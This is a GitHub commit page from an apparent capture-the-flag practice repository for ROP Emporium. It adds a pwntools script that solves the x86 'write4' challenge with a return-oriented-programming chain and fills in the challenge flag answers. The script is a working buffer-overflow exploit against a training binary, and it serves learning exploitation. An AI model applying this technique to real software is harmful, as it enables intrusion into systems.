Solving 3-write4 in x86 + x86 flags refacto

ChenXIXIXIXXI · Jun 22, 2021 · c344fe9 · c344fe9
1 parent bf81251
commit c344fe9
Show file tree

Hide file tree

Showing 5 changed files with 46 additions and 3 deletions.
diff --git a/x86/0-ret2win/core b/x86/0-ret2win/core
diff --git a/x86/0-ret2win/flag.txt b/x86/0-ret2win/flag.txt
@@ -1 +1 @@
-ROPE{a_placeholder_32byte_flag!}
+ROPE{ret2win_in_x86_eip_save}
diff --git a/x86/1-split/flag.txt b/x86/1-split/flag.txt
@@ -1 +1 @@
-ROPE{a_placeholder_32byte_flag!}
+ROPE{split_ret2libc_in_x86}
diff --git a/x86/3-write4/flag.txt b/x86/3-write4/flag.txt
@@ -1 +1 @@
-ROPE{a_placeholder_32byte_flag!}
+ROPE{WR1t34_in_x86_data_section}
diff --git a/x86/3-write4/solve.py b/x86/3-write4/solve.py
@@ -0,0 +1,43 @@
+from pwn import *
+
+BINARY = "./write432"
+ELF = ELF(BINARY)
+
+context.os = "linux"
+context.arch = "i386"
+context.binary = BINARY
+
+p = process(BINARY)
+
+pop2ret = 0x080485aa
+mov_ptr_edi_ebp = 0x08048543 # mov DWORD PTR [edi], ebp ; ret
+data_adr = 0x0804A018
+
+rop = b"A" * 44
+
+# Writing "flag.txt" in data/bss section
+rop += p32(pop2ret)
+rop += p32(data_adr)
+rop += b"flag"
+rop += p32(mov_ptr_edi_ebp)
+
+rop += p32(pop2ret)
+rop += p32(data_adr+4)
+rop += b".txt"
+rop += p32(mov_ptr_edi_ebp)
+
+#rop += p32(pop2ret)
+#rop += p32(data_adr+8)
+#rop += p32(0) # "\0\0\0\0"
+#rop += p32(mov_ptr_edi_ebp)
+
+# Returnin to print_file
+rop += p32(ELF.symbols['print_file'])
+rop += p32(pop2ret)
+rop += p32(data_adr)
+
+p.sendline(rop)
+log.success(f"ROPchain = {rop}")
+
+flag = p.recvall().split(b'\n')[-2]
+log.success(f"FLAG : {flag}")
Original file line number	Diff line number	Diff line change
		@@ -1 +1 @@
		ROPE{a_placeholder_32byte_flag!}
		ROPE{ret2win_in_x86_eip_save}
Original file line number	Diff line number	Diff line change
		@@ -1 +1 @@
		ROPE{a_placeholder_32byte_flag!}
		ROPE{split_ret2libc_in_x86}
Original file line number	Diff line number	Diff line change
		@@ -1 +1 @@
		ROPE{a_placeholder_32byte_flag!}
		ROPE{WR1t34_in_x86_data_section}